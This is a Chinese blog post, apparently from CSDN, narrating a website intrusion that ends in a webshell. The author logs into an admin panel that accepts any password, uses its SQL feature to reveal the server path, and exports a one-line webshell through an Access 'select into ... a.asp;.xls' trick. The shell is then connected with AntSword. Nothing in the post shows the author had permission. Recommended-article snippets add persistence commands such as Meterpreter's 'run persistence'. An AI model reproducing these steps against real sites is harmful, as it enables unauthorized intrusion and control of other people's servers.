记一次渗透getshell的过程吧!!!!

最新推荐文章于 2023-03-17 11:32:20 发布
最新推荐文章于 2023-03-17 11:32:20 发布
阅读量2.3k 收藏 8
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38611079/article/details/96562254
版权

渗透一个网站通常先做信息收集,但是这次比较特殊,直接拿到的是网站后台的登录页面。先试试运气吧。

 

 

发现疑似后台,先进行尝试。进行弱口令尝试。发现意外惊喜,后台竟然任意密码登录,(这也是写这个博客的原因,运气太好了吧。)

登录完成,进入后台。

东逛逛西看看后,想办法上传webshell.

可以执行sql,那么先报错,拿到路径

数据库为access

进行导出一句话

select * into [a] in 'D:\freehost\charm358\web\a.asp;.xls' 'excel 4.0;' from shell

drop table shell

蚁剑连接shell

 

接下来看着办吧

 

 

27sss
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux权限维持
qq_32445755的博客
04-19 882
简介 我们知道前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们可以将这些漏洞加以利用或组合来进行getshell的。在这里我们再区分一下getshell和webshell的区别,webshell更多的是获取前端的权限,顾名思义,一般仅限于前端或文件的增删改查;那么getshell则是获取更大的权限。一般的思路为挖掘漏洞,通过漏洞加以组合或利用获取webshell或后台权限,之后再进一步getshell。 文件属性修改 重命名文件 mv 1.sh promethe
sql注入(get型)漏洞
qq_58970968的博客
03-29 1942
1,概念 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一,攻击过程 信息探测 kali里面主要下面三个探测方式: ·扫描主机服务信息以及服务版本 -- nmap -sV 靶场IP地址 如下图所示: ·快速扫描主机全部信息 -- nmap -T4 -A -v 靶场IP地址 这个与上面的比较起来扫描时间会更多,但信息会更
渗透测试——后渗透攻击
YT的博客
02-18 6215
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令:run persistence -X -i 5 -p 4...
网站后台getshell的方法总结
anlalu233的博客
03-24 4822
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张...
从PHP开始学渗透 -- GET请求和POST请求
weixin_41489908的博客
05-07 1155
​成年人只管利益,小孩子才分对错。。。 ---- 网易云热评 一、GET请求 1、get可以理解为一个系统定义好的数组 2、通过var_dump看一下GET的类型,浏览器访问网址,后面加上"?aiyou=bucuo",相当与数组名为GET,键是aiyou,值是bucuo 3、一般get请求都是访问某个文件 4、通过GET写文件 <?php$a=$_GET['aiyou'];//取键为aiyou的值$b=fopen("aiyou.txt", "w+");//打开文件fw...
SQL注入知识点总结
千寻的博客
02-11 1084
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
一次tp5.0.24 getshell1
08-03
"一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
gup.rar_Get Fast!
09-14
在这个场景下,“Lockless get_user_pages_fast for s390”是核心关注点,它涉及到Linux内核中的一个特定功能,用于在s390架构上无锁地获取用户空间页面。s390是IBM的一款大型主机系统,其硬件特性对高效内存管理有...
geturl_Free!_GetURL_powerserver_
09-30
All examples include a PB10.5 version and most have a PB12.6 version. The PB12.6 versions are verified to work in 64bit. PowerServer doesn't support the longptr type so you must use the PB10.5 version...
agc.rar_AGC matlab_Get a Life!_agc
09-21
学习并实践这个AGC MATLAB项目,不仅可以深入理解自动增益控制的工作原理,还能锻炼编程和仿真技能,对于从事通信工程或信号处理相关工作的人来说,是一次有价值的"Get a Life!"经历。在探索未知的过程中,不断提升...
WCF_Free!_WCFLibraryHelper_
09-28
The attached Zip file is a virus free file to help you get started with Microsoft Visual Basic Windows Communication Foundation
渗透攻击详解
07-06
1、探测信息 2、利用漏洞得到管理账号密码 3、找到后台 4、登录后台取得web权限 如果发现直接有上传漏洞就可以利用
渗透测试 post请求和get请求的区别
weixin_52194536的博客
07-18 666
post请求与get请求
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2261
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 5964
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
靶机练习:获取外网getshell进行内网渗透测试
weixin_45906324的博客
11-21 1172
实验靶场联系笔 文章目录实验靶场联系笔搭建环境实验工具实验要求实验流程 搭建环境 vmware导入两台靶场并开机,靶机下载地址 https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1 实验工具 VMware® Workstation 15 Pro 版本:15...
百万人都在求的网络安全学习路线,渗透漏洞防御总结(附图)
2201_75362610的博客
03-17 203
前言不折腾的网络安全,和咸鱼有什么区别目录二、 前言三 、同源策略3.1 什么是同源策略3.2 为什么需要同源策略四 、XSS4.1 概览4.2 介绍4.3 防御五 、CSRF5.1 概览5.2 介绍5.3 防御六、 SQL 注入七 、流量劫持7.1 DNS 劫持7.2 HTTP 劫持八 、浏览器网络安全九、 浏览器系统安全十 、参考文献。
渗透攻击命令和模块
Cwillchris的博客
04-12 1329
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话转在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
(转)GET来的漏洞
weixin_30823833的博客
08-19 546
转自呆子不开口在wooyun知识库的文章 0x00 前言 这篇文章主要讲目前互联网上get方法被不规范使用带来的一些安全漏洞。其中重点会讲get请求在账号登陆体系中被滥用的场景和攻击方式。 0x01 Get方法的定义 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST GET - 从指定的资源请求数据 POST - 向指定的资源提交要被处理的数...
if (hs.get(number)!=null)
最新发布
05-30
`hs` 是一个 HashMap 对象,`get()` 方法可以用来获取指定键对应的值。如果指定键存在,`get()` 方法会返回对应的值;如果不存在,`get()` 方法会返回 `null`。因此,`hs.get(number)!=null` 就是判断 HashMap 中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值